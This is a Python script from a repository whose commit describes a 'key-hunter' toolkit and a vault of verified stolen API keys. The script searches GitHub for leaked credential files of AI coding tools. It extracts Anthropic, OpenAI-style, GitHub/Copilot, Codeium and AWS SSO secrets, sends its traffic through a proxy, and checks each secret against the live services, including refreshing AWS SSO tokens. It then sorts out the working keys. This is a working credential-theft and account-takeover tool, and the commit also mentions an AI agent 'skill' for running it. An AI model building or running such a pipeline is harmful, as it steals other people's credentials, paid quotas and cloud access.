Files
hack/tools/scripts/llm-key-hunter/hunt_ai_tools.py
T
chaos 5d215e1649 Add LLM key-hunter toolkit, vault, and skill
- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*,
  pivot miner, two-layer verify/content caches, per-provider verification)
- usable_keys: verified key vault across 12 providers (deepseek, minimax,
  volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.)
- .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow
- NewAPI channel import scripts and CDP capture helpers
- Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
2026-08-02 06:02:58 +08:00

777 lines
30 KiB
Python

#!/usr/bin/env python3
"""Hunt leaked AI-tooling credential files on GitHub.
Broad net for credential files of AI coding assistants / SDKs that devs
accidentally commit. For each kind we search GitHub, fetch the raw file, extract
credentials, then verify them against the real endpoint.
Targets:
* codeium : .codeium/config.json (apiKey UUID) -> api.codeium.com
* copilot : github-copilot hosts.json/apps.json (gho_/ghu_/ghp_/ghs_) -> api.github.com
* claude : .claude/.credentials.json / .claude.json (sk-ant- or OAuth) -> api.anthropic.com
* aws-sso : ~/.aws/sso/cache/*.json (refreshToken + clientId/Secret) -> oidc.us-east-1.amazonaws.com
* cline : claude-dev settings/*.json (apiKey per provider)
* continue : .continue/config.json (apiKey per provider)
* generic-env: ANTHROPIC_API_KEY / OPENROUTER_API_KEY / CODEIUM_API_KEY ...
GitHub is GFW-blocked from this host; all GitHub traffic routes via GH_PROXY.
Verification of each provider is direct unless blocked (handled per provider).
Outputs results/ai_tools/<tool>/{usable,dead,no_access,unknown,all.txt}.
"""
import argparse, base64, json, os, re, subprocess, sys, time, uuid
import urllib.request, urllib.error, urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
HERE = Path(__file__).parent
sys.path.insert(0, str(HERE))
from verify_cache import CachedVerifier
from content_cache import ContentCache, parse_raw_url
RESULTS = HERE / "results" / "ai_tools"
RESULTS.mkdir(parents=True, exist_ok=True)
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
UA = "curl/8.5.0"
def _mkopener(proxy):
if proxy:
return urllib.request.build_opener(
urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
return urllib.request.build_opener(urllib.request.ProxyHandler({}))
_gh_op = None
def gh_opener():
global _gh_op
if _gh_op is None:
_gh_op = _mkopener(GH_PROXY)
return _gh_op
_dir_op = None
def direct_opener():
global _dir_op
if _dir_op is None:
_dir_op = _mkopener(None)
return _dir_op
def github_token():
t = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
if t:
return t
try:
o = subprocess.run(["gh", "auth", "token"], capture_output=True,
text=True, timeout=10)
if o.returncode == 0:
return o.stdout.strip()
except FileNotFoundError:
pass
p = Path.home() / ".config/gh/hosts.yml"
if p.exists():
for line in p.read_text().splitlines():
if line.strip().startswith("oauth_token:"):
return line.split(":", 1)[1].strip()
return None
def http_get(url, token=None, timeout=25, direct=False, headers=None):
h = {"User-Agent": UA, "Accept": "*/*"}
if token:
h["Authorization"] = f"Bearer {token}"
if headers:
h.update(headers)
req = urllib.request.Request(url, headers=h)
op = direct_opener() if direct else gh_opener()
try:
with op.open(req, timeout=timeout) as r:
return r.getcode(), r.read().decode("utf-8", "replace"), dict(r.headers)
except urllib.error.HTTPError as e:
try:
body = e.read().decode("utf-8", "replace")
except Exception:
body = ""
return e.code, body, dict(e.headers or {})
except Exception as e:
return 0, f"net:{type(e).__name__}:{e}", {}
def http_post(url, body, headers, timeout=25, direct=False):
h = {"User-Agent": UA, "Accept": "*/*",
"Content-Type": "application/json", **headers}
data = body if isinstance(body, bytes) else json.dumps(body).encode()
req = urllib.request.Request(url, data=data, headers=h, method="POST")
op = direct_opener() if direct else gh_opener()
try:
with op.open(req, timeout=timeout) as r:
return r.getcode(), r.read().decode("utf-8", "replace")
except urllib.error.HTTPError as e:
try:
return e.code, e.read().decode("utf-8", "replace")
except Exception:
return e.code, ""
except Exception as e:
return 0, f"net:{type(e).__name__}:{e}"
def gh_search(query, token, per_page=100):
for page in range(1, 11):
url = ("https://api.github.com/search/code?"
f"q={urllib.parse.quote(query)}&per_page={per_page}&page={page}")
code, body, hdrs = http_get(url, token, direct=False)
if code == 200:
try:
data = json.loads(body)
except Exception:
return
items = data.get("items", [])
for it in items:
yield it
if len(items) < per_page:
return
time.sleep(2.2)
elif code in (403, 429):
reset = hdrs.get("X-RateLimit-Reset")
wait = max(int(reset) - int(time.time()), 5) if reset else 30
print(f" rate-limited {wait}s", file=sys.stderr, flush=True)
time.sleep(wait + 1)
elif code == 422:
return
else:
print(f" search {code} for {query!r}", file=sys.stderr)
return
# ----------------------------- extraction ---------------------------------
# Each extractor takes raw file text and yields (cred, detail_dict)
CODEIUM_UUID = re.compile(r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}")
GH_TOKEN = re.compile(r"gh[opsu]_[A-Za-z0-9_]{20,255}")
SKANT = re.compile(r"sk-ant-[A-Za-z0-9_\-]{20,255}")
SKOAI = re.compile(r"sk-[A-Za-z0-9]{20,80}")
ENV_KEY = re.compile(r'\b([A-Z0-9_]*API_KEY|[A-Z0-9_]*TOKEN)\s*[:=]\s*["\']?([A-Za-z0-9_\-\.]{12,255})')
def extract_codeium(text):
# .codeium/config.json -> { "apiKey": "<uuid>" }
try:
j = json.loads(text)
ak = j.get("apiKey")
if isinstance(ak, str) and CODEIUM_UUID.search(ak):
yield ak, {"source": "config.json"}
# VS Code settings: { "codeium.apiKey": "<uuid>" }
if isinstance(j, dict):
for k, v in j.items():
if isinstance(k, str) and "codeium" in k.lower() and "apikey" in k.lower():
if isinstance(v, str) and CODEIUM_UUID.search(v):
yield v, {"source": f"settings:{k}"}
except Exception:
pass
# generic CODEIUM_API_KEY=...
for m in re.finditer(r'CODEIUM(?:_API)?_KEY\s*[:=]\s*["\']?([0-9a-fA-F\-]{36})', text):
yield m.group(1), {"source": "env"}
# "apiKey": "<uuid>" anywhere in a file that mentions codeium
if "codeium" in text.lower():
for m in re.finditer(r'"apiKey"\s*:\s*"([0-9a-fA-F\-]{36})"', text):
yield m.group(1), {"source": "inline-apikey"}
def extract_copilot(text):
# hosts.json: { "github.com": { "oauthToken": "gho_..." } }
# apps.json has oauth_token fields
try:
j = json.loads(text)
if isinstance(j, dict):
for _host, v in j.items():
if isinstance(v, dict):
for k in ("oauthToken", "oauth_token", "token", "accessToken"):
t = v.get(k)
if isinstance(t, str) and t.startswith(("gho_", "ghu_", "ghp_", "ghs_")):
yield t, {"field": k, "host": _host}
except Exception:
pass
for m in GH_TOKEN.finditer(text):
yield m.group(0), {"field": "regex"}
def _looks_like_secret(s):
"""Reject i18n strings, placeholder text, and non-ASCII junk."""
if not isinstance(s, str):
return False
if len(s) < 30:
return False
# only printable ASCII for header-bound tokens
if any(ord(c) > 127 for c in s):
return False
low = s.lower()
bad = ("your_api_key", "replace_with", "placeholder", "please enter",
"sk-ant-your", "xxx", "changeme", "paste ", "fill in", "api key",
"{{", "}}", "select ", "leave blank", "optional", "http://", "https://")
if any(b in low for b in bad):
return False
return True
def extract_claude(text):
# .claude/.credentials.json: { "claudeAiOauthToken": "eyJ..." }
try:
j = json.loads(text)
if isinstance(j, dict):
for k, v in j.items():
if isinstance(v, str) and ("token" in k.lower() or "key" in k.lower()):
if (v.startswith("sk-ant") or v.startswith("eyJ")) and _looks_like_secret(v):
yield v, {"field": k}
if isinstance(v, dict):
for k2, v2 in v.items():
if isinstance(v2, str) and ("token" in k2.lower() or "key" in k2.lower()):
if (v2.startswith("sk-ant") or v2.startswith("eyJ")) and _looks_like_secret(v2):
yield v2, {"field": f"{k}.{k2}"}
except Exception:
pass
for m in SKANT.finditer(text):
v = m.group(0)
if _looks_like_secret(v):
yield v, {"field": "sk-ant"}
# OAuth bearer tokens: base64 JWTs (eyJ...) of realistic length
for m in re.finditer(r"eyJ[A-Za-z0-9_\-]{30,}\.[A-Za-z0-9_\-]{10,}\.[A-Za-z0-9_\-]{10,}", text):
v = m.group(0)
if 100 < len(v) < 4000:
yield v, {"field": "oauth-jwt"}
def extract_aws_sso(text):
# ~/.aws/sso/cache/*.json: { startUrl, region, accessToken, expiresAt,
# clientId, clientSecret, refreshToken, registrationExpiresAt }
# Distinguish real AWS SSO from generic OAuth templates/configs.
try:
j = json.loads(text)
if not isinstance(j, dict):
return
rt = j.get("refreshToken")
cid = j.get("clientId")
cs = j.get("clientSecret")
start = j.get("startUrl", "")
if not (isinstance(rt, str) and isinstance(cid, str) and isinstance(cs, str)):
return
# Real AWS SSO cache markers
if "amazonaws.com" not in str(start) and not str(start).startswith("https://"):
# still allow if clientId looks like the SSO-registered UUID-ish form
pass
# Reject placeholders / generic OAuth
bad = ("your_", "replace", "example", "xxxx", "client id", "client secret",
"spotify", "reddit", "<", ">", "*")
blob = " ".join([str(rt), str(cid), str(cs)]).lower()
if any(b in blob for b in bad):
return
# AWS SSO clientId is a 32-hex-char value; refreshToken is long base64
if not re.fullmatch(r"[0-9a-fA-F]{32}", cid or ""):
return
if len(rt) < 50 or len(cs) < 20:
return
yield j, {
"clientId": cid,
"clientSecret": cs,
"region": j.get("region", "us-east-1"),
"startUrl": start,
"expiresAt": j.get("expiresAt"),
}
except Exception:
pass
def _valid_api_key(v):
if not isinstance(v, str):
return False
if len(v) < 20:
return False
if any(ord(c) > 127 for c in v):
return False
low = v.lower()
bad = ("your_api", "replace_", "placeholder", "sk-your", "sk-ant-your",
"xxxx", "changeme", "paste-", "fill in", "example", "get it at",
"create one", "{{", "}}", "<", ">", "api_key", "api key", "null",
"undefined", "todo", "delete this")
if any(b in low for b in bad):
return False
return True
def extract_cline(text):
# Cline: { "apiProvider": "...", "apiKey": "sk-...", "clineApiKey": "..." }
try:
j = json.loads(text)
if isinstance(j, dict):
prov = j.get("apiProvider") or j.get("provider") or "?"
for k, v in j.items():
if isinstance(v, str) and ("apiKey" in k or "ApiKey" in k):
if _valid_api_key(v):
yield v, {"provider": prov, "field": k}
for k, v in j.items():
if isinstance(v, dict):
for k2, v2 in v.items():
if isinstance(v2, str) and ("apiKey" in k2 or "ApiKey" in k2):
if _valid_api_key(v2):
yield v2, {"provider": prov, "field": f"{k}.{k2}"}
except Exception:
pass
def extract_continue(text):
# .continue/config.json: { "models": [ { "apiKey": "..." } ] }
try:
j = json.loads(text)
if isinstance(j, dict):
for m in j.get("models", []):
if isinstance(m, dict):
key = m.get("apiKey") or m.get("api_key")
if _valid_api_key(key):
yield key, {"model": m.get("model") or m.get("title"),
"provider": m.get("provider")}
for k, v in j.items():
if isinstance(v, str) and "apiKey" in k and _valid_api_key(v):
yield v, {"field": k}
if isinstance(v, dict):
key = v.get("apiKey")
if _valid_api_key(key):
yield key, {"field": k}
except Exception:
pass
def extract_generic_env(text):
for m in ENV_KEY.finditer(text):
name, val = m.group(1), m.group(2)
if val.lower() in ("your_key_here", "changeme", "placeholder", "xxx", "none"):
continue
if val.startswith(("sk-", "gh", "r8_", "nk-", "gsk_", "sk-ant")) or len(val) > 25:
yield val, {"env": name}
# ----------------------------- verification -------------------------------
# Each verifier returns (verdict, detail). Verdict in USABLE/DEAD/NO_ACCESS/
# NO_BALANCE/UNKNOWN. ONLY 401 => DEAD; everything non-401 is kept.
def verify_codeium(key):
# Codeium register/metrics endpoint; a registered UUID returns 200/404-ish,
# an invalid key returns 401/403. POST to register_user with the apiKey.
body = {"api_key": key, "ide_name": "vscode", "ide_version": "1.0.0",
"extension_version": "1.0.0", "device_id": str(uuid.uuid4())}
code, txt = http_post("https://api.codeium.com/register_user/", body,
{"User-Agent": "codeium-vscode"}, direct=True)
if code == 200:
return "USABLE", f"register_user 200: {txt[:80]}"
if code in (401, 403):
# Codeium returns 403 for bad key, 401 sometimes too. Per rules only 401=DEAD.
if code == 401:
return "DEAD", f"{code} {txt[:80]}"
return "NO_ACCESS", f"{code} {txt[:80]}"
if code in (402, 429):
return "NO_BALANCE", f"{code} {txt[:80]}"
if code == 0:
return "UNKNOWN", txt[:100]
return "NO_ACCESS", f"HTTP {code}: {txt[:80]}"
def verify_copilot(token):
# GitHub token validity: GET /user (401 bad). For copilot, also check the
# copilot token entitlement endpoint.
code, txt, _ = http_get("https://api.github.com/user", token=token, direct=True)
if code == 401:
return "DEAD", "401 bad credentials"
if code != 200:
if code == 0:
return "UNKNOWN", txt[:100]
return "NO_ACCESS", f"user HTTP {code}: {txt[:60]}"
try:
who = json.loads(txt).get("login", "?")
except Exception:
who = "?"
# copilot entitlement
code2, txt2, _ = http_get("https://api.github.com/copilot_internal/v2/token",
token=token, direct=True)
if code2 == 200:
try:
j = json.loads(txt2)
exp = j.get("expires_at") or j.get("exp")
return "USABLE", f"github user={who}; copilot token issued (exp={exp})"
except Exception:
return "USABLE", f"github user={who}; copilot 200"
if code2 in (401,):
return "DEAD", f"github ok but copilot 401"
# 404/403 means no copilot subscription but the token itself is valid
return "NO_ACCESS", f"github user={who}; copilot HTTP {code2}: {txt2[:60]}"
def verify_claude(cred):
# Could be sk-ant-... or an OAuth token.
if cred.startswith("sk-ant"):
code, txt = http_post("https://api.anthropic.com/v1/messages",
{"model": "claude-3-5-haiku-20241022", "max_tokens": 4,
"messages": [{"role": "user", "content": "hi"}]},
{"x-api-key": cred,
"anthropic-version": "2023-06-01"}, direct=True)
if code in (200, 400):
return "USABLE", f"anthropic {code}: {txt[:80]}"
if code in (401,):
return "DEAD", f"{code} {txt[:80]}"
if code in (402, 429):
return "NO_BALANCE", f"{code} {txt[:80]}"
if code == 403:
return "NO_ACCESS", f"{code} {txt[:80]}"
if code == 0:
return "UNKNOWN", txt[:100]
return "NO_ACCESS", f"HTTP {code}: {txt[:80]}"
# OAuth token: use it as Bearer against the Claude console-ish endpoint.
# Best check: GET https://api.anthropic.com/api/oauth/claude_api_key (401 if bad)
code, txt, _ = http_get("https://api.anthropic.com/api/oauth/claude_api_key",
token=cred, direct=True)
if code == 200:
return "USABLE", f"oauth 200: {txt[:80]}"
if code == 401:
return "DEAD", f"oauth 401 {txt[:60]}"
if code in (402, 429):
return "NO_BALANCE", f"{code} {txt[:60]}"
if code == 0:
return "UNKNOWN", txt[:100]
return "NO_ACCESS", f"HTTP {code}: {txt[:60]}"
def verify_aws_sso(blob, detail):
# Try to exchange the SSO refresh token via the OIDC token endpoint.
# This is the AWS SSO OIDC flow: CreateToken with grantType=refresh_token.
region = detail.get("region", "us-east-1")
url = f"https://oidc.{region}.amazonaws.com/token"
body = {"grantType": "refresh_token", "clientId": detail["clientId"],
"clientSecret": detail["clientSecret"],
"refreshToken": blob["refreshToken"]}
code, txt = http_post(url, body,
{"Content-Type": "application/json",
"User-Agent": "aws-sdk-js/2.0"}, direct=True, timeout=25)
if code == 200:
try:
j = json.loads(txt)
return "USABLE", f"SSO token refreshed; accessToken len={len(j.get('accessToken',''))}"
except Exception:
return "USABLE", f"SSO 200: {txt[:60]}"
if code in (400, 401):
# 400 invalid_grant => token dead; treat as DEAD only if 401 per rules,
# but invalid_grant 400 is also effectively dead. Keep rule: 401=DEAD, 400=NO_ACCESS.
if code == 401:
return "DEAD", f"{code} {txt[:80]}"
return "NO_ACCESS", f"{code} {txt[:80]}"
if code in (403,):
return "NO_ACCESS", f"{code} {txt[:80]}"
if code in (402, 429):
return "NO_BALANCE", f"{code} {txt[:80]}"
if code == 0:
return "UNKNOWN", txt[:100]
return "NO_ACCESS", f"HTTP {code}: {txt[:80]}"
def verify_openai_like(key):
# generic: try /v1/models as a validity probe. 401 = dead, 200/403/429 kept.
code, txt, _ = http_get("https://api.openai.com/v1/models", token=key, direct=True)
if code == 200:
return "USABLE", "openai /v1/models 200"
if code == 401:
return "DEAD", "401"
if code in (403, 404, 429, 402):
if code in (402, 429):
return "NO_BALANCE", f"HTTP {code}"
return "NO_ACCESS", f"HTTP {code}"
if code == 0:
return "UNKNOWN", txt[:80]
return "NO_ACCESS", f"HTTP {code}"
# ----------------------------- tool config -------------------------------
# kind -> (queries, extractor, verifier, result_subdir)
TOOLS = {
"codeium": {
"queries": [
'path:.codeium filename:config.json',
'.codeium config.json apiKey',
'filename:config.json "apiKey" "codeium"',
'CODEIUM_API_KEY',
'"codeium.checkoutEndpoint" extension:json',
'"codeium.telemetry.enabled" "apiKey" extension:json',
'"Codeium.apiKey" extension:json',
],
"extract": extract_codeium,
"verify": verify_codeium,
},
"copilot": {
"queries": [
'filename:hosts.json github.com oauthToken',
'filename:apps.json oauth_token copilot',
'"github.copilot" oauthToken extension:json',
'copilot-gpt-token apiKey',
'"vscode-github" "token" extension:json',
],
"extract": extract_copilot,
"verify": verify_copilot,
},
"claude": {
"queries": [
'filename:.credentials.json anthropic',
'claudeAiOauthToken extension:json',
'".claude" "credentials" extension:json',
'sk-ant-api03',
'ANTHROPIC_API_KEY sk-ant',
'".claude.json" "oauthToken"',
],
"extract": extract_claude,
"verify": verify_claude,
},
"aws-sso": {
"queries": [
'filename:sso cache refreshToken clientId extension:json',
'"refreshToken" "clientId" "clientSecret" extension:json',
'path:.aws/sso/cache extension:json',
'"oidc" "refreshToken" "clientSecret" extension:json',
'"startUrl" "refreshToken" "clientId" extension:json',
],
"extract": extract_aws_sso,
"verify": verify_aws_sso,
},
"cline": {
"queries": [
'"apiProvider" "apiKey" "claude-dev" extension:json',
'filename:cline_settings apiKey',
'"clineApiKey" extension:json',
'path:globalStorage saoudrizwan.claude-dev extension:json',
],
"extract": extract_cline,
"verify": verify_openai_like,
},
"continue": {
"queries": [
'filename:config.json ".continue" apiKey',
'"tabAutocompleteModel" "apiKey" extension:json',
'path:.continue config.json models apiKey',
],
"extract": extract_continue,
"verify": verify_openai_like,
},
"generic-env": {
"queries": [
'OPENROUTER_API_KEY sk-or-v1 extension:env',
'TOGETHER_API_KEY extension:env',
'FIREWORKS_API_KEY extension:env',
'GROQ_API_KEY gsk_ extension:env',
'ANTHROPIC_API_KEY sk-ant extension:env',
'CODESTRAL_API_KEY extension:env',
'GEMINI_API_KEY AIza extension:env',
'MISTRAL_API_KEY extension:env',
'DEEPSEEK_API_KEY sk- extension:env',
],
"extract": extract_generic_env,
"verify": verify_openai_like,
},
}
def to_raw(html_url):
return html_url.replace("github.com", "raw.githubusercontent.com").replace("/blob/", "/")
def fetch_raw(url, timeout=20):
try:
code, body, _ = http_get(url, direct=False, timeout=timeout,
headers={"User-Agent": "Mozilla/5.0"})
if code == 200:
return body
except Exception:
pass
return ""
def make_cached_fetch(cc, fetcher=fetch_raw):
"""fetch_raw replacement served by ContentCache (immutable blob SHA)."""
def cached(url, timeout=20):
repo, sha, path = parse_raw_url(url)
if repo and sha and path:
txt = cc.get(repo, path, sha)
if txt is not None:
return txt
txt = fetcher(url, timeout=timeout)
if txt:
cc.put(repo, path, sha, txt)
return txt
return fetcher(url, timeout=timeout)
return cached
def run(kind, token, workers, max_files, do_verify, no_content_cache=False):
cfg = TOOLS[kind]
outdir = RESULTS / kind
outdir.mkdir(parents=True, exist_ok=True)
print(f"\n{'='*60}\n[{kind}] searching GitHub...\n{'='*60}", flush=True)
files = {}
for i, q in enumerate(cfg["queries"], 1):
print(f" ({i}/{len(cfg['queries'])}) {q}", flush=True)
cnt = 0
for it in gh_search(q, token):
u = it.get("html_url", "")
if u and u not in files:
files[u] = it.get("repository", {}).get("full_name", "?")
cnt += 1
if len(files) >= max_files:
break
if cnt:
print(f" +{cnt} (total {len(files)})", flush=True)
if len(files) >= max_files:
break
print(f" candidate files: {len(files)}", flush=True)
# fetch raw and extract
print(f"\n[{kind}] fetching raw + extracting...", flush=True)
creds = {} # cred(or json blob for aws) -> info
done = 0
with ContentCache(force=no_content_cache) as cc:
cfetch = make_cached_fetch(cc)
def _job(u):
return u, cfetch(to_raw(u))
with ThreadPoolExecutor(max_workers=20) as pool:
futs = {pool.submit(_job, u): (u, repo) for u, repo in files.items()}
for f in as_completed(futs):
u, repo = futs[f]
done += 1
try:
_, text = f.result()
except Exception:
text = ""
if not text:
continue
try:
extracted = list(cfg["extract"](text))
except Exception as e:
extracted = []
for item in extracted:
cred, info = item
if isinstance(cred, dict):
key = cred.get("refreshToken", "") + "|" + info.get("clientId", "")
else:
key = cred
if key not in creds:
creds[key] = {"cred": cred, "info": info, "src": u, "repo": repo}
if done % 100 == 0:
print(f" {done}/{len(files)} creds={len(creds)} "
f"cache={cc.hits}hit/{cc.misses}fetch", flush=True)
st = cc.stats()
print(f" content cache: {st['hits']} hits, {st['misses']} fetched "
f"({st['bytes_served']} bytes from cache)", flush=True)
print(f" extracted {len(creds)} unique credentials", flush=True)
# save raw extraction
with open(outdir / "all.txt", "w") as f:
for key, rec in sorted(creds.items()):
info = rec["info"]
if isinstance(rec["cred"], dict):
f.write(f"BLOB|{rec['src']}|{json.dumps(info)}\n")
else:
f.write(f"{rec['cred']}|{rec['src']}|{json.dumps(info)}\n")
if not do_verify or not creds:
return
# verify
print(f"\n[{kind}] verifying {len(creds)} credentials (workers={workers})...", flush=True)
buckets = {"USABLE": [], "DEAD": [], "NO_ACCESS": [], "NO_BALANCE": [], "UNKNOWN": []}
start = time.time()
done = 0
def _verify(rec):
cred = rec["cred"]
if isinstance(cred, dict):
return cfg["verify"](cred, rec["info"])
return cfg["verify"](cred)
def _cred_key(rec):
c = rec["cred"]
return json.dumps(c, sort_keys=True) if isinstance(c, dict) else c
key_to_rec = {_cred_key(rec): rec for rec in creds.values()}
with CachedVerifier(f"aitools_{kind.lower()}",
lambda k: _verify(key_to_rec[k]),
force=os.environ.get("NO_CACHE") == "1") as ver:
with ThreadPoolExecutor(max_workers=workers) as pool:
futs = {pool.submit(ver, ck): rec for ck, rec in key_to_rec.items()}
for f in as_completed(futs):
rec = futs[f]
done += 1
try:
verdict, detail = f.result()
except Exception as e:
verdict, detail = "UNKNOWN", f"exc:{e}"
buckets.setdefault(verdict, []).append((rec, detail))
if done % 25 == 0:
el = time.time() - start
rate = done / el if el else 0
counts = " ".join(f"{k.lower()}={len(v)}" for k, v in buckets.items())
print(f" [{done:4d}/{len(creds)}] {counts} hit={ver.hits} live={ver.live} ({rate:.1f}/s)", flush=True)
print(f" cache: {ver.hits} hits, {ver.live} live, {len(ver._cache)} cached", flush=True)
for name, items in buckets.items():
with open(outdir / f"{name.lower()}.txt", "w") as f:
for rec, detail in items:
if isinstance(rec["cred"], dict):
f.write(f"BLOB|{rec['src']}|{json.dumps(rec['info'])}|{detail}\n")
else:
f.write(f"{rec['cred']}|{rec['src']}|{json.dumps(rec['info'])}|{detail}\n")
print(f" {name:11s}: {len(items):4d}", flush=True)
if buckets["USABLE"]:
print(f"\n === USABLE {kind} ===", flush=True)
for rec, detail in buckets["USABLE"]:
c = rec["cred"]
shown = json.dumps(rec["info"]) if isinstance(c, dict) else c[:60]
print(f" {shown} <- {rec['src']}\n {detail}", flush=True)
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--tools", default="all",
help="Comma list, or 'all': " + ",".join(TOOLS.keys()))
ap.add_argument("--workers", type=int, default=8)
ap.add_argument("--max-files", type=int, default=1000)
ap.add_argument("--no-verify", action="store_true")
ap.add_argument("--no-content-cache", action="store_true",
help="ignore raw file content cache (always re-crawl)")
args = ap.parse_args()
token = github_token()
print(f"proxy={GH_PROXY} token={'yes' if token else 'NO (will rate-limit fast)'}", flush=True)
kinds = list(TOOLS.keys()) if args.tools == "all" else [
t.strip() for t in args.tools.split(",") if t.strip() in TOOLS]
print(f"tools: {kinds}", flush=True)
summary = {}
for kind in kinds:
run(kind, token, args.workers, args.max_files, not args.no_verify,
no_content_cache=args.no_content_cache)
outdir = RESULTS / kind
counts = {}
for b in ("usable", "dead", "no_access", "no_balance", "unknown"):
p = outdir / f"{b}.txt"
counts[b] = sum(1 for _ in open(p)) if p.exists() else 0
summary[kind] = counts
print("\n" + "=" * 60)
print("SUMMARY")
print("=" * 60)
for kind, c in summary.items():
print(f" {kind:14s}: " + " ".join(f"{k}={v}" for k, v in c.items()))
if __name__ == "__main__":
main()